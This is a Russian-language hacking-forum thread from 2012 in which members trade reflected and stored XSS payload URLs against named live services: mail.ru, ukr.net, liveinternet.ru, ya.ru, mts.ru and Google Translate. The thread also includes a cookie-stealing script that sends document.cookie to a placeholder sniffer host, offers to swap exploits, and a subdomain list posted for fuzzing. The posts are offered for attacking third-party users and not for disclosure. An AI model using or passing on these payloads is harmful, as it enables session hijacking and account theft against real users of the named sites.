Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Mail.ru
    Code:
    http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform="><script>alert('xss')</script>
     
    #161 kravch_v, 2 Feb 2012
    Last edited: 2 Feb 2012
    1 person likes this.
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    kravch_v, не надо юзать HTML, если XSS внутри JS-кода.
    http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
     
  3. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    M_script, спасибо!

    Google XSS
    Code:
    http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код
    Пример:
    Code:
    http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/
    
    Для кражи кук используйте следующий код:
    Code:
    <script>img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;</script>
    // M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.
     
    #163 kravch_v, 4 Feb 2012
    Last edited: 4 Feb 2012
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?

    upd:
    Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
     
    #164 M_script, 4 Feb 2012
    Last edited: 5 Feb 2012
  5. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Mail.Ru - Недостаточная фильтрация в cookie

    Уязвимый код (cookie):
    Code:
    Mpop=test:test:[email protected]"><script>alert('xss')</script>;
    Заходим на w2.dwar.mail.ru и код успешно выполняется.
     
  6. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Почта Укр.нет

    HTML:
    http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">+<":
    Поставлен оброботчик onMouseover

    Уязвимое место

    По сути можно поставить onerror и onload, нужно только подумать как .
     
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Странная реализация.
    Зачем закрывать тег и писать <": ?
    onMouseover требует дополнительных действий пользователя.
    Угловые скобки не фильтруются. Можно использовать любые теги для выполнения кода.
    http://kino.ukr.net/search?query="><img+src=1+onerror="alert(document.cookie)
    Или выполнить код без действий пользователя, не закрывая тег.
    http://kino.ukr.net/search?query="+onfocus=alert(document.cookie)+autofocus="
     
  8. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Code:
    http://kino.ukr.net/persons/search?query="><img+src=1+onerror="alert('xss')
    Code:
    http://play.ukr.net/videos/upload
    Поля: Заголовок, Описание, Теги
    Уязвимый код: <script>alert('xss')</script>
    Также есть активная XSS на самой странице видео.
    Уязвимое место "теги" ;)
     
    #168 kravch_v, 5 Feb 2012
    Last edited: 5 Feb 2012
  9. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    LiveInternet.Ru
    • POST Запрос
      Code:
      http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111"><script>alert(/xss/)</script>

    • Code:
      http://liveinternet.ru/flashes.php?id=58259&page=0&filter="><script>alert('xss')</script>

    • Code:
      http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo="><script>alert('xss')</script>

    • Code:
      http://litube.li.ru/yandex/?search_string=111"><script>alert('xss')</script>
     
  10. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Ya.ru
    Уязвимый код:
    Code:
    <img src=1 onerror="alert('XSS')" />
    1) Заходим на clubs.ya.ru
    2) Жмякаем на "Записать мысль"
    3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
    XSS Выполняется.
     
    1 person likes this.
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Это не пассивка, а DOM-based
     
  12. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Но тем не менее.
    Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются <script>, </script> и еще несколько HTML-Тегов).
    <Img..., <hr>, <br> - выводятся.
     
  13. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://pulse.mts.ru/search?q="><script>alert(document.cookie)</script>
     
  14. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    На мaил есть рабочая хcс?
    Мoгу пoменяться на oбхoд 704 oшибки
     
  15. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Xss на mail.ru

    Работает не во всех платформах OC на Windows 7 не пашет.

    Code:
    http://search.enc.mail.ru/search_enc?q="><img src=k onerror=alert(0);>
     
  16. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    на xp тоже не пашет
     
  17. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    xss mail.ru

    Не знаю почему у меня работает,честно.

    [​IMG]
     
  18. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,160
    Likes Received:
    366
    Reputations:
    226
    Браузер обнови) попробуй.
     
  19. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    Список 403 доменов на мейл.ру
    если у кого есть желание могут поФаззить на скрипты
    там дырявые есть 100%, парочку пасивок на прошлой неделе снял
    Code:
    http://aj.mail.ru
    http://bs.mail.ru
    http://dn.mail.ru
    http://ff.mail.ru
    http://fx.mail.ru
    http://js.mail.ru
    http://kp.mail.ru
    http://ok.mail.ru
    http://r1.mail.ru
    http://r2.mail.ru
    http://r3.mail.ru
     
  20. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Xss на Mail.ru

    1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6.

    2. Добавить Контакт

    3.
    4.Вставляем этот код в любое место

    5.Нажимаем найти